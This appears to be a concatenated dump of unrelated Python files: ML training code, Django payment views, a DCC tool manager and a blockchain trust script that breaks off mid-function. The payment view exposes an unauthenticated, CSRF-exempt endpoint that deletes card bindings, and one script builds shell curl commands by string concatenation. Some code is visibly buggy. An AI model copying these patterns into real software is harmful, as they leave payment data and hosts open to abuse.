# A-Z, a-z, 0-9, or any unicode characters in the
# range 00c00-u02b08 which is a number of weird characters
# not normally used in English. The range was found by manually
# looking through the table located at
# https://unicode-table.com/en/#ipa-extensions
# for some common vowels that occur in other languages.
# The motivation for this was in processing moby-dick.txt
# in the examples where â was being misinterpreted as
# a word boundary by the re module.
words = re.findall(r'\w*[\'-\u00c00-u02b08]*\w', text)
frequency_dict = {word: 0 for word in words}
# Do it this way rather than using count, because it avoids
# doing len(words) lookups over the whole text.
for word in words:
frequency_dict[word] += 1
if sort:
# Sort the dictionary by the values. Dictionarys are ordered in Python
# 3.6 and above but that is not the case for old versions where you
# must use collections.OrderedDict.
frequency_dict = sort_dict(frequency_dict)
return frequency_dict
def sort_dict(frequency_dict, reverse=True):
"""
sort_dict(dictionary)
Sorts a dictionary based on the numerical values stored in the dict.
Inputs:
dictionary, dict:
Dictionary with integer values.
Outputs:
dictionary, dict:
Dictionary sorted by value.
Examples:
>>> a = {'a': 2, 'b': 1, 'c': 5}
>>> FolderAnalyse.fileparser.sort_dict(a, reverse=True)
{'c': 5, 'a': 2, 'b': 1}
>>> FolderAnalyse.fileparser.sort_dict(a, reverse=False)
{'b': 1, 'a': 2, 'c': 5}
Notes:
Dictionarys are ordered in Python 3.6 and above but that is not the
case for old versions where you must use collections.OrderedDict.
"""
sorted_dict_keys = sorted(frequency_dict, key=frequency_dict.get,
reverse=reverse)
sorted_dict = {key: frequency_dict[key] for key in sorted_dict_keys}
return sorted_dict
def combine_dicts(dicts_list):
"""
combine_dicts(dicts_list)
Combines dictionaries by summing the numerical values of any keys
which are shared between them.
Inputs:
dicts_list, list
A list containing dictionaries with integer values.
Outputs:
dict:
A combined dictionary with summed values.
Example:
>>> a = {'a': 2, 'b': 1, 'c': 5}
>>> b = {'b': 4, 'c': 12, 'e': 4}
>>> FolderAnalyse.parser.combine_dicts([a, b])
{'a': 2, 'b': 5, 'c': 17, 'e': 4}
"""
# Combine all dictionarys keys into a single
# list and find the unique set of them.
all_keys = []
for freq_dict in dicts_list:
all_keys += list(freq_dict.keys())
keys = set(all_keys)
# Generate the new dictionary with all keys
combined_dict = {key: 0 for key in keys}
# Iterate over the list of keys so that
# the memory access pattern to the combined_dict
# avoids jumping around. If key is not found in
# a given fdict, just pass over.
for key in keys:
for fdict in dicts_list:
try:
combined_dict[key] += fdict[key]
except:
pass
return combined_dict
|
993,521 | 6cdcca1c94d576494a259389d2f214c9971c295e |
from __future__ import division, print_function, unicode_literals
import os
import numpy as np
import torch
import torch.utils.data
import torchvision.models as models
import torchvision.transforms as transforms
import torch.nn as nn
#get_ipython().magic(u'matplotlib inline')
import matplotlib.pyplot as plt
from torch.autograd import Variable
from PIL import Image
batch_size = 1
num_epochs = 5
learning_rate = 0.01
# Creates a dictionary for class name to index/label conversion
def class_to_index(root):
class_list = sorted([directory for directory in os.listdir(root)])
class_to_labels = {class_list[i]: i for i in range(len(class_list))}
return class_to_labels
# Creates a list of image file path and label pairs
def create_dataset(root, class_to_labels):
dataset = []
for label in sorted(class_to_labels.keys()):
path = os.path.join(root, label)
for image_file in os.listdir(path):
image_file = os.path.join(path, image_file)
if os.path.isfile(image_file):
dataset.append((image_file, class_to_labels[label]))
return dataset
class CDATA(torch.utils.data.Dataset): # Extend PyTorch's Dataset class
def __init__(self, root_dir, train, transform=None):
self.root = root_dir
self.train = train
self.transform = transform
if train:
image_folder = os.path.join(self.root, "train")
else:
image_folder = os.path.join(self.root, "test")
class_to_labels = class_to_index(image_folder)
self.dataset = create_dataset(image_folder, class_to_labels)
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
image_path, label = self.dataset[idx]
image = Image.open(image_path).convert('RGB')
if self.transform is not None:
image = self.transform(image)
return (image, label)
composed_transform = transforms.Compose([transforms.Scale((224,224)),transforms.ToTensor()])
train_dataset = CDATA(root_dir='/home/george/py_programs/CDATA/notMNIST_small', train=True, transform=composed_transform) # Supply proper root_dir
test_dataset = CDATA(root_dir='/home/george/py_programs/CDATA/notMNIST_small/', train=False, transform=composed_transform) # Supply proper root_dir
# Let's check the size of the datasets, if implemented correctly they should be 16854 and 1870 respectively
print('Size of train dataset: %d' % len(train_dataset))
print('Size of test dataset: %d' % len(test_dataset))
# Create loaders for the dataset
train_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)
vgg16 = models.vgg16(pretrained=True)
#resnet18 = models.resnet18(pretrained=True)
# Code to change the last layers so that they only have 10 classes as output
vgg16.classifier = nn.Sequential(
nn.Linear(512 * 7 * 7, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, 10),
)
criterion = nn.CrossEntropyLoss() # Define cross-entropy loss
###### WAAAAITTTT!!
# What is the difference between CrossEntropyLoss() and CrossEntropyLoss???? I got an error because of this saying CrossEntropyLoss object has
# no attribute backward()
optimizer_vgg16 = torch.optim.Adam(vgg16.parameters(), lr=learning_rate) # Use Adam optimizer, use learning_rate hyper parameter
def train_vgg16(train_loader, optimizer):
#for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
images = Variable(images)
labels = Variable(labels)
optimizer_vgg16.zero_grad()
print(i)
outputs = vgg16(images)
error = criterion(outputs, labels)
error.backward()
optimizer_vgg16.step()
if (i+1) % 100 == 0:
print ('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'
%(epoch+1, num_epochs, i+1, len(train_data)//batch_size, error.data[0]))
def train_resnet18():
# Same as above except now using the Resnet-18 network
pass
def test(model):
pass
|
993,522 | e6c4678c2bd0dc82ce6f86f186fa6ed0b3fc6df5 | class Solution(object):
def simplifyPath(self, path):
if not path:
return path
stack = []
temp = list(path.split('/'))
for each in temp:
if each == '.' or not each:
pass
elif each == '..':
if stack:
stack.pop()
else:
stack.append(each)
return '/'+'/'.join(stack)
|
993,523 | 0b0900420481ccbd67e23535c0a5fb195f6bf7d4 | from hashlib import sha256
import hmac
import json
from collections import OrderedDict
from django.conf import settings
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from rest_framework.response import Response
from rest_framework.views import APIView
from sberbank.models import Payment, LogEntry, Status
from sberbank.service import BankService
from sberbank.serializers import PaymentSerializer
class StatusView(APIView):
@staticmethod
def get(request, uid=None):
try:
payment = Payment.objects.get(uid=uid)
except Payment.DoesNotExist:
return HttpResponse(status=404)
return Response({"status": Status(payment.status).name})
class BindingsView(APIView):
@staticmethod
def get(request, client_id=None):
svc = BankService(settings.MERCHANT_KEY)
return Response(svc.get_bindings(client_id))
class BindingView(APIView):
authentication_classes = []
@staticmethod
def delete(request, binding_id=None):
svc = BankService(settings.MERCHANT_KEY)
svc.deactivate_binding(binding_id)
return HttpResponse(status=200)
@method_decorator(csrf_exempt)
def dispatch(self, *args, **kwargs):
return super(BindingView, self).dispatch(*args, **kwargs)
class GetHistoryView(APIView):
@staticmethod
def get(request, client_id=None, format=None):
payments = Payment.objects.filter(client_id=client_id, status=Status.SUCCEEDED).order_by('-updated')
serializer = PaymentSerializer(payments, many=True)
return Response(serializer.data)
def callback(request):
data = OrderedDict(sorted(request.GET.items(), key=lambda x: x[0]))
try:
payment = Payment.objects.get(bank_id=data.get('mdOrder'))
except Payment.DoesNotExist:
return HttpResponse(status=200)
merchant = settings.MERCHANTS.get(settings.MERCHANT_KEY)
hash_key = merchant.get('hash_key')
if hash_key:
check_str = ''
for key, value in data.items():
if key != 'checksum':
check_str += "%s;%s;" % (key, value)
checksum = hmac.new(hash_key.encode(), check_str.encode(), sha256) \
.hexdigest().upper()
LogEntry.objects.create(
action="callback",
bank_id=payment.bank_id,
payment_id=payment.uid,
response_text=json.dumps(request.GET),
checksum=checksum
)
if checksum != data.get('checksum'):
payment.status = Status.FAILED
payment.save()
return HttpResponseBadRequest('Checksum check failed')
if int(data.get('status')) == 1:
payment.status = Status.SUCCEEDED
elif int(data.get('status')) == 0:
payment.status = Status.FAILED
payment.save()
return HttpResponse(status=200)
def redirect(request, kind=None):
try:
payment = Payment.objects.get(bank_id=request.GET.get('orderId'))
except Payment.DoesNotExist:
return HttpResponse(status=404)
svc = BankService(settings.MERCHANT_KEY)
svc.check_status(payment.uid)
LogEntry.objects.create(
action="redirect_%s" % kind,
bank_id=payment.bank_id,
payment_id=payment.uid,
response_text=json.dumps(request.GET),
)
svc.check_bind_refund(payment)
merchant = settings.MERCHANTS.get(settings.MERCHANT_KEY)
return HttpResponseRedirect("%s?payment=%s" % (merchant["app_%s_url" % kind], payment.uid))
|
993,524 | 7775c311ea01de9b283508abbeeb32285254b43e | from django.conf.urls import patterns, include, url
from django.contrib import admin
import urls
from apps.blog import views
urlpatterns = patterns('',
url(r'^p/(?P<pk>[\w\d]+)/(?P<slug>[\w\d-]+)/$', views.PostDetail.as_view(), name='detail'),
url(r'^category/(?P<catname>[\w\d]+)/$', views.CatDetail.as_view(), name='catViews'),
url(r'^tag/(?P<tagname>[\w\d]+)/$', views.TagDetail.as_view(), name='tagViews'),
)
|
993,525 | 5d5299a5f4c05942ffb407d6519ea45fd71b989d | # Generated by Django 3.2 on 2021-06-19 08:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('photographer', '0021_photoportfolio_seat_number'),
]
operations = [
migrations.AddField(
model_name='photoportfolio',
name='column',
field=models.CharField(choices=[('kolumna1', 'kolumna1'), ('kolumna2', 'kolumna2'), ('kolumna3', 'kolumna3')], default=1, max_length=20),
preserve_default=False,
),
]
|
993,526 | 807adbcce4c99262170c50b35d6a368aa8dfe216 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains implementation for DCC tools
"""
from __future__ import print_function, division, absolute_import
import os
import logging
import inspect
from collections import OrderedDict
from tpDcc import dcc
from tpDcc.core import tool
from tpDcc.managers import plugins, configs, resources
from tpDcc.libs.python import decorators, python, path as path_utils
from tpDcc.libs.qt.core import contexts
import pkgutil
if python.is_python2():
import pkgutil as loader
else:
import importlib.util
import importlib as loader
LOGGER = logging.getLogger('tpDcc-core')
@decorators.add_metaclass(decorators.Singleton)
class ToolsManager(plugins.PluginsManager, object):
def __init__(self):
super(ToolsManager, self).__init__(interface=tool.DccTool)
self._layout = dict()
self._loaded_tools = dict()
self._tools_to_load = OrderedDict()
self._hub_tools = list()
# ============================================================================================================
# BASE
# ============================================================================================================
def load_plugin(self, pkg_name, pkg_loaders, environment, root_pkg_name=None, config_dict=None, load=True):
"""
Implements load_plugin function
Registers a plugin instance to the manager
:param pkg_name: str
:param pkg_loaders: plugin instance to register
:param environment:
:param root_pkg_name:
:param config_dict:
:param load:
:return: Plugin
"""
if not pkg_loaders:
return False
package_loader = pkg_loaders[0] if isinstance(pkg_loaders, (list, tuple)) else pkg_loaders
if not package_loader:
return False
if hasattr(package_loader, 'loader'):
if not package_loader.loader:
return False
plugin_path = package_loader.filename if python.is_python2() else os.path.dirname(package_loader.loader.path)
plugin_name = package_loader.fullname if python.is_python2() else package_loader.loader.name
if not config_dict:
config_dict = dict()
local = os.getenv('APPDATA') or os.getenv('HOME')
config_dict.update({
'join': os.path.join,
'user': os.path.expanduser('~'),
'filename': plugin_path,
'fullname': plugin_name,
'root': path_utils.clean_path(plugin_path),
'local': local,
'home': local
})
if pkg_name not in self._plugins:
self._plugins[pkg_name] = dict()
tools_found = list()
version_found = None
packages_to_walk = [plugin_path] if python.is_python2() else [os.path.dirname(plugin_path)]
for sub_module in pkgutil.walk_packages(packages_to_walk):
importer, sub_module_name, _ = sub_module
qname = '{}.{}'.format(plugin_name, sub_module_name)
try:
mod = importer.find_module(sub_module_name).load_module(sub_module_name)
except Exception:
# LOGGER.exception('Impossible to register plugin: "{}"'.format(plugin_path))
continue
if qname.endswith('__version__') and hasattr(mod, '__version__'):
if version_found:
LOGGER.warning('Already found version: "{}" for "{}"'.format(version_found, plugin_name))
else:
version_found = getattr(mod, '__version__')
mod.LOADED = load
for cname, obj in inspect.getmembers(mod, inspect.isclass):
for interface in self._interfaces:
if issubclass(obj, interface):
tool_config_dict = obj.config_dict(file_name=plugin_path) or dict()
if not tool_config_dict:
continue
tool_id = tool_config_dict.get('id', None)
tool_config_name = tool_config_dict.get('name', None)
# tool_icon = tool_config_dict.get('icon', None)
if not tool_id:
LOGGER.warning(
'Impossible to register tool "{}" because its ID is not defined!'.format(tool_id))
continue
if not tool_config_name:
LOGGER.warning(
'Impossible to register tool "{}" because its name is not defined!'.format(
tool_config_name))
continue
if root_pkg_name and root_pkg_name in self._plugins and tool_id in self._plugins[root_pkg_name]:
LOGGER.warning(
'Impossible to register tool "{}" because its ID "{}" its already defined!'.format(
tool_config_name, tool_id))
continue
if not version_found:
version_found = '0.0.0'
obj.VERSION = version_found
obj.FILE_NAME = plugin_path
obj.FULL_NAME = plugin_name
tools_found.append((qname, version_found, obj))
version_found = True
break
if not tools_found:
LOGGER.warning('No tools found in module "{}". Skipping ...'.format(plugin_path))
return False
if len(tools_found) > 1:
LOGGER.warning(
'Multiple tools found ({}) in module "{}". Loading first one. {} ...'.format(
len(tools_found), plugin_path, tools_found[-1]))
tool_found = tools_found[-1]
else:
tool_found = tools_found[0]
tool_loader = loader.find_loader(tool_found[0])
# Check if DCC specific implementation for plugin exists
dcc_path = '{}.dccs.{}'.format(plugin_name, dcc.get_name())
dcc_loader = None
dcc_config = None
try:
dcc_loader = loader.find_loader(dcc_path)
except ImportError:
pass
tool_config_dict = tool_found[2].config_dict(file_name=plugin_path) or dict()
tool_id = tool_config_dict['id']
_tool_name = tool_config_dict['name']
tool_icon = tool_config_dict['icon']
tool_config_name = plugin_name.replace('.', '-')
tool_config = configs.get_config(
config_name=tool_config_name, package_name=pkg_name, root_package_name=root_pkg_name,
environment=environment, config_dict=config_dict, extra_data=tool_config_dict)
if dcc_loader:
dcc_path = dcc_loader.fullname
dcc_config = configs.get_config(
config_name=dcc_path.replace('.', '-'), package_name=pkg_name,
environment=environment, config_dict=config_dict)
if not dcc_config.get_path():
dcc_config = None
# Register resources
def_resources_path = os.path.join(plugin_path, 'resources')
# resources_path = plugin_config.data.get('resources_path', def_resources_path)
resources_path = tool_config_dict.get('resources_path', None)
if not resources_path or not os.path.isdir(resources_path):
resources_path = def_resources_path
if os.path.isdir(resources_path):
resources.register_resource(resources_path, key='tools')
else:
pass
# tp.logger.debug('No resources directory found for plugin "{}" ...'.format(_plugin_name))
# Register DCC specific resources
if dcc_loader and dcc_config:
def_resources_path = os.path.join(dcc_loader.filename, 'resources')
resources_path = dcc_config.data.get('resources_path', def_resources_path)
if not resources_path or not os.path.isdir(resources_path):
resources_path = def_resources_path
if os.path.isdir(resources_path):
resources.register_resource(resources_path, key='plugins')
else:
pass
# tp.logger.debug('No resources directory found for plugin "{}" ...'.format(_plugin_name))
# Create tool loggers directory
default_logger_dir = os.path.normpath(os.path.join(os.path.expanduser('~'), 'tpDcc', 'logs', 'tools'))
default_logging_config = os.path.join(plugin_path, '__logging__.ini')
logger_dir = tool_config_dict.get('logger_dir', default_logger_dir)
if not os.path.isdir(logger_dir):
os.makedirs(logger_dir)
logging_file = tool_config_dict.get('logging_file', default_logging_config)
tool_package = plugin_name
tool_package_path = plugin_path
dcc_package = None
dcc_package_path = None
if dcc_loader:
dcc_package = dcc_loader.fullname if python.is_python2() else dcc_loader.loader.path
dcc_package_path = dcc_loader.filename if python.is_python2() else dcc_loader.loader.name
self._plugins[pkg_name][tool_id] = {
'name': _tool_name,
'icon': tool_icon,
'package_name': pkg_name,
'loader': package_loader,
'config': tool_config,
'config_dict': tool_config_dict,
'plugin_loader': tool_loader,
'plugin_package': tool_package,
'plugin_package_path': tool_package_path,
'version': tool_found[1] if tool_found[1] is not None else "0.0.0",
'dcc_loader': dcc_loader,
'dcc_package': dcc_package,
'dcc_package_path': dcc_package_path,
'dcc_config': dcc_config,
'logging_file': logging_file,
'plugin_instance': None
}
LOGGER.info('Tool "{}" registered successfully!'.format(plugin_name))
return True
def get_tool_settings_file_path(self, tool_id):
"""
Returns the path where tool settings file is located
:param tool_id:
:return: str
"""
settings_path = path_utils.get_user_data_dir(appname=tool_id)
settings_file = path_utils.clean_path(os.path.expandvars(os.path.join(settings_path, 'settings.cfg')))
return settings_file
def get_tool_settings_file(self, tool_id):
"""
Returns the settings file of the given tool
:param tool_id: str
:return: settings.QtSettings
"""
from tpDcc.libs.qt.core import settings
settings_file = self.get_tool_settings_file_path(tool_id)
return settings.QtSettings(filename=settings_file)
def get_tool_data_from_id(self, tool_id, package_name=None):
"""
Returns registered plugin data from its id
:param tool_id: str
:param package_name: str
:return: dict
"""
if not tool_id:
return None
if not package_name:
package_name = tool_id.replace('.', '-').split('-')[0]
if package_name and package_name not in self._plugins:
LOGGER.error('Impossible to retrieve data from id: {} package "{}" not registered!'.format(
tool_id, package_name))
return None
return self._plugins[package_name][tool_id] if tool_id in self._plugins[package_name] else None
def cleanup(self):
"""
Cleanup all loaded tools
:return:
"""
from tpDcc.managers import menus
LOGGER.info('Cleaning tools ...')
for plug_name, plug in self._plugins.items():
plug.cleanup()
LOGGER.info('Shutting down tool: {}'.format(plug.ID))
# plugin_id = plug.keys()[0]
self._plugins.pop(plug_name)
self._plugins = dict()
for package_name in self._plugins.keys():
menus.remove_previous_menus(package_name=package_name)
# ============================================================================================================
# TOOLS
# ============================================================================================================
def register_package_tools(self, pkg_name, root_pkg_name=None, tools_to_register=None, dev=True, config_dict=None):
"""
Registers all tools available in given package
"""
environment = 'development' if dev else 'production'
if not tools_to_register:
return
tools_to_register = python.force_list(tools_to_register)
if config_dict is None:
config_dict = dict()
tools_path = '{}.tools.{}'
for tool_name in tools_to_register:
pkg_path = tools_path.format(pkg_name, tool_name)
if python.is_python2():
pkg_loader = loader.find_loader(pkg_path)
else:
pkg_loader = importlib.util.find_spec(pkg_path)
if not pkg_loader:
# if tool_name in self._tools_to_load:
# self._tools_to_load.pop(tool_name)
continue
else:
tool_data = {
'loaders': pkg_loader,
'pkg_name': pkg_name,
'root_pkg_name': root_pkg_name,
'environment': environment,
'config_dict': config_dict
}
self._tools_to_load[tool_name] = tool_data
return self._tools_to_load
def load_registered_tools(self, package_name):
"""
Load all tools that were already registered
:return:
"""
if not self._tools_to_load:
LOGGER.warning('No tools to register found!')
return
for tool_name, tool_data in self._tools_to_load.items():
pkg_name = tool_data['pkg_name']
if pkg_name != package_name:
continue
root_pkg_name = tool_data['root_pkg_name']
pkg_loaders = tool_data['loaders']
environment = tool_data['environment']
config_dict = tool_data['config_dict']
self.load_plugin(
pkg_name=pkg_name, root_pkg_name=root_pkg_name, pkg_loaders=pkg_loaders, environment=environment,
load=True, config_dict=config_dict)
def get_registered_tools(self, package_name=None):
"""
Returns all registered tools
:param package_name: str or None
:return: list
"""
if not self._plugins:
return None
if package_name and package_name not in self._plugins:
LOGGER.error('Impossible to retrieve data from instance: package "{}" not registered!'.format(package_name))
return None
if package_name:
return self._plugins[package_name]
else:
all_tools = dict()
for package_name, package_data in self._plugins.items():
for tool_name, tool_data in package_data.items():
all_tools[tool_name] = tool_data
return all_tools
def get_package_tools(self, package_name):
"""
Returns all tools of the given package
:param package_name: str
:return: list
"""
if not package_name:
LOGGER.error('Impossible to retrieve data from plugin with undefined package!')
return None
if package_name not in self._plugins:
LOGGER.error('Impossible to retrieve data from instance: package "{}" not registered!'.format(package_name))
return None
package_tools = self.get_registered_tools(package_name=package_name)
return package_tools
def get_tool_by_plugin_instance(self, plugin, package_name=None):
"""
Returns tool instance by given plugin instance
:param plugin:
:param package_name: str
:return:
"""
if not package_name:
package_name = plugin.PACKAGE if hasattr(plugins, 'PACKAGE') else None
if not package_name:
LOGGER.error('Impossible to retrieve data from plugin with undefined package!')
return None
if package_name not in self._plugins:
LOGGER.error(
'Impossible to retrieve data from instance: package "{}" not registered!'.format(package_name))
return None
if hasattr(plugin, 'ID'):
return self.get_tool_by_id(tool_id=plugin.ID, package_name=plugin.PACKAGE)
return None
def get_tool_by_id(self, tool_id, package_name=None, dev=False, *args, **kwargs):
"""
Launches tool of a specific package by its ID
:param tool_id: str, tool ID
:param package_name: str, str
:param dev: bool
:param args: tuple, arguments to pass to the tool execute function
:param kwargs: dict, keyword arguments to pas to the tool execute function
:return: DccTool or None, executed tool instance
"""
if not package_name:
package_name = tool_id.replace('.', '-').split('-')[0]
if package_name not in self._plugins:
LOGGER.warning('Impossible to load tool by id: package "{}" is not registered!'.format(package_name))
return None
if tool_id in self._plugins[package_name]:
tool_inst = self._plugins[package_name][tool_id].get('tool_instance', None)
if tool_inst:
return tool_inst
tool_to_run = None
for plugin_id in self._plugins[package_name].keys():
tool_path = self._plugins[package_name][plugin_id]['plugin_package']
sec_path = tool_path.replace('.', '-')
if sec_path == tool_path or sec_path == tool_id:
tool_to_run = tool_id
break
else:
tool_name = tool_path.split('.')[-1]
if tool_name == tool_path:
tool_to_run = tool_id
break
if not tool_to_run or tool_to_run not in self._plugins[package_name]:
LOGGER.warning('Tool "{}" is not registered!'.format(tool_id))
return None
tool_loader = self._plugins[package_name][tool_to_run]['loader']
pkg_loader = self._plugins[package_name][tool_to_run]['loader']
tool_config = self._plugins[package_name][tool_to_run]['config']
tool_fullname = tool_loader.fullname if python.is_python2() else tool_loader.loader.name
tool_version = self._plugins[package_name][tool_to_run]['version']
pkg_name = pkg_loader.filename if python.is_python2() else os.path.dirname(pkg_loader.loader.path)
pkg_path = pkg_loader.fullname if python.is_python2() else pkg_loader.loader.name
tool_found = None
for sub_module in pkgutil.walk_packages([self._plugins[package_name][tool_to_run]['plugin_package_path']]):
tool_importer, sub_module_name, _ = sub_module
mod = tool_importer.find_module(sub_module_name).load_module(sub_module_name)
for cname, obj in inspect.getmembers(mod, inspect.isclass):
if issubclass(obj, tool.DccTool):
obj.FILE_NAME = pkg_name
obj.FULL_NAME = pkg_path
tool_found = obj
break
if tool_found:
break
if not tool_found:
LOGGER.error("Error while launching tool: {}".format(tool_fullname))
return None
# if dcc_loader:
# tool_config = dcc_config
tool_settings = self.get_tool_settings_file(tool_id)
if not tool_settings.has_setting('theme'):
tool_settings.set('theme', 'default')
tool_settings.setFallbacksEnabled(False)
tool_inst = tool_found(self, config=tool_config, settings=tool_settings, dev=dev, *args, **kwargs)
tool_inst.ID = tool_id
tool_inst.VERSION = tool_version
tool_inst.AUTHOR = tool_inst.config_dict().get('creator', None)
tool_inst.PACKAGE = package_name
self._plugins[package_name][tool_id]['tool_instance'] = tool_inst
# self._plugins[package_name][plugin_id]['tool_instance'] = tool_inst
return tool_inst
def launch_tool_by_id(self, tool_id, package_name=None, dev=False, *args, **kwargs):
"""
Launches tool of a specific package by its ID
:param tool_id: str, tool ID
:param package_name: str, str
:param dev: bool
:param args: tuple, arguments to pass to the tool execute function
:param kwargs: dict, keyword arguments to pas to the tool execute function
:return: DccTool or None, executed tool instance
"""
tool_inst = self.get_tool_by_id(
tool_id=tool_id, package_name=package_name, dev=dev, *args, **kwargs)
if not tool_inst:
return None
hub = kwargs.pop('hub', False)
if hub and tool_id != 'tpDcc-tools-hub':
hub_ui = self.get_last_focused_hub_ui(include_minimized=False)
if hub_ui:
hub_ui.toggle_toolset(tool_id)
return tool_inst
else:
LOGGER.warning('No HubUI tool opened. Opening tool using standard method ...')
self.close_tool(tool_id)
with contexts.application():
self._launch_tool(tool_inst, tool_id, *args, **kwargs)
return tool_inst
def close_tool(self, tool_id, force=True):
"""
Closes tool with given ID
:param tool_id: str
"""
if tool_id not in self._loaded_tools:
return False
closed_tool = False
parent = dcc.get_main_window()
if parent:
for child in parent.children():
if child.objectName() == tool_id:
child.fade_close() if hasattr(child, 'fade_close') else child.close()
closed_tool = True
tool_to_close = self._loaded_tools[tool_id].attacher
try:
if not closed_tool and tool_to_close:
tool_to_close.fade_close() if hasattr(tool_to_close, 'fade_close') else tool_to_close.close()
if force and tool_to_close:
tool_to_close.setParent(None)
tool_to_close.deleteLater()
except RuntimeError:
pass
self._loaded_tools.pop(tool_id)
return True
def close_tools(self):
"""
Closes all available tools
:return:
"""
for tool_id in self._loaded_tools.keys():
self.close_tool(tool_id, force=True)
def _launch_tool(self, tool_inst, tool_id, *args, **kwargs):
"""
Launches given tool class
:param tool_inst: cls, DccTool instance
:param args: tuple, arguments to pass to tool execute function
:param kwargs: dict, keyword arguments to pass to the tool execute function
:return: DccTool or None, executed tool instance
"""
if tool_id == 'tpDcc-tools-hub':
tool_data = tool_inst._launch(*args, **kwargs)
tool_ui = tool_data['tool']
self._hub_tools.append(tool_ui)
else:
self.close_tool(tool_id)
tool_inst._launch(*args, **kwargs)
self._loaded_tools[tool_id] = tool_inst
LOGGER.debug('Execution time: {}'.format(tool_inst.stats.execution_time))
return tool_inst
# ============================================================================================================
# HUB
# ============================================================================================================
def close_hub_ui(self, hub_ui_inst):
if hub_ui_inst in self._hub_tools:
self._hub_tools.remove(hub_ui_inst)
LOGGER.debug('Close tpDcc Hub UI: {}'.format(hub_ui_inst))
def get_hub_uis(self):
return self._hub_tools
def get_last_focused_hub_ui(self, include_minimized=True):
"""
Returns last focused Hub UI
:param include_minimized: bool, Whether or not take into consideration Hub UIs that are minimized
:return: HubUI
"""
hub_ui_found = None
max_time = 0
all_hub_uis = self.get_hub_uis()
for ui in all_hub_uis:
if ui.isVisible() and ui.last_focused_time > max_time:
if (not include_minimized and not ui.isMinimized()) or include_minimized:
hub_ui_found = ui
max_time = ui.last_focused_time
return hub_ui_found
def get_last_opened_hub_ui(self):
"""
Returns last opened Hub UI
:return: HubUI
"""
hub_ui_found = None
all_hub_uis = self.get_hub_uis()
for ui in all_hub_uis:
if ui.isVisible():
hub_ui_found = ui
return hub_ui_found
# ============================================================================================================
# CONFIGS
# ============================================================================================================
def get_tool_config(self, tool_id, package_name=None):
"""
Returns config applied to given tool
:param tool_id: str
:param package_name: str
:return: Theme
"""
if not package_name:
package_name = tool_id.replace('.', '-').split('-')[0]
if package_name not in self._plugins:
LOGGER.warning(
'Impossible to retrieve tool config for "{}" in package "{}"! Package not registered.'.format(
tool_id, package_name))
return None
if tool_id not in self._plugins[package_name]:
LOGGER.warning(
'Impossible to retrieve tool config for "{}" in package "{}"! Tool not found'.format(
tool_id, package_name))
return None
config = self._plugins[package_name][tool_id].get('config', None)
return config
# ============================================================================================================
# THEMES
# ============================================================================================================
def get_tool_theme(self, tool_id, package_name=None):
"""
Returns theme applied to given tool
:param tool_id: str
:param package_name: str
:return: Theme
"""
found_tool = self.get_tool_by_id(tool_id, package_name=package_name)
if not found_tool:
return None
theme_name = found_tool.settings.get('theme', 'default')
return resources.theme(theme_name)
|
993,527 | 36d67062ac0e5ce456568b5888710af246d3f75b | import urllib.request
import random
import json
import os
from time import sleep
#print(authenticNode)
connected_nodes = [] #nodes present in the network
banned_nodes = {} # banned nodes
trust_values = {} # trust values of each and every node
trust_ranking = {} # ranking based on trust value (visible)
def checkConnectivity(): #checking connectivity of nodes in network
nodes = ["http://192.168.29.39:3001/", "http://192.168.29.39:3002/", "http://192.168.29.39:3003/", "http://192.168.29.39:3004/", "http://192.168.29.39:3005/"]
for node in nodes:
response = os.system("curl -I " + node)
if response == 0:
#pingStatus = True
connected_nodes.append(node[:-1])
#else:
#pingStatus = False
#return pingStatus
checkConnectivity()
trust_values = { i : 0 for i in connected_nodes }
def connectionPersists(node): #persistance of connection of nodes in network
response = os.system("curl -I " + node + "/")
if response == 0:
return True
return False
#checkConnectivity()
#print (connected_nodes)
#print (trust_values)
def authentication(): #validation phase of transaction
node = random.choice(connected_nodes)
url = node + "/blockchain"
open_url = urllib.request.urlopen(url)
data = json.load(open_url)
if not 'pendingTransactions' in data or len(data['pendingTransactions']) != 0:
for txn in data['pendingTransactions']:
value = trust_values[txn['node']]
value = value + 1
trust_values[txn['node']] = value
else:
print ("No pending transaction to process")
#authentication()
#print (trust_values)
"""
nodes = ["http://192.168.29.39:3001/", "http://192.168.29.39:3002/", "http://192.168.29.39:3003/", "http://192.168.29.39:3004/", "http://192.168.29.39:3005/"]
trust = {nodes[0]:0,nodes[1]:0, nodes[2]:0, nodes[3]:0, nodes[4]:0}
list_node=[]
def authentication():
node = random.choice(nodes)
url = node + "/blockchain"
r = urllib.request.urlopen(url)
data = json.load(r)
for txn in data['pendingTransactions']:
#print(txn['transactionId'])
list_node.append(txn['nodeName'])
#authentication()
#print (list_node)
def dosprevention():
#checkConnectivity()
if (checkConnectivity()):
sleep(60)
if (checkConnectivity()):
value = trust[dos_prevented]
value = value +8
trust[dos_prevented] = value
else:
value = trust[dos_prevented]
value = value - 8
trust[dos_prevented] = value
else:
print ("Network node not connected")
def mine():
a = authentication()
if len(list_node) !=0:
for node in list_node:
value = trust[node]
#print(value)
value = value + 1
trust[node]=value
#print ("ignore")
list_node = []
miner_node = random.choice(nodes)
url = miner_node + "/mine"
r = urllib.request.urlopen(url)
data = json.load(r)
value = trust[miner_node]
value = value +8
trust[miner_node]=value
def scalable():
print ("scaling")
def trustvalue():
authentication(node)
mine(node)
dosPrevention()
#majorityApproval(node)
"""
def timeMeasure(): #time based incentives for nodes
for node in connected_nodes:
if connectionPersists(node):
value = trust_values[node]
value = value + 1
trust_values[node] = value
def blockMiner(): #mining rewards for nodes which also includes points
authentication()
miner_node = random.choice(connected_nodes)
url = miner_node + "/mine"
mined = urllib.request.urlopen(url)
data = json.load(mined)
value = trust_values[miner_node]
value = value + 8
trust_values[miner_node] = value
def banned(node, value): #trace of banned nodes
banned_nodes.update({node, value})
def trustRanking(trust_value): #trust ranking based on points in network
for node in trust_value:
if trust_value[node] < -10:
banned(node, trust_value[node])
elif -10<= trust_value[node] <0:
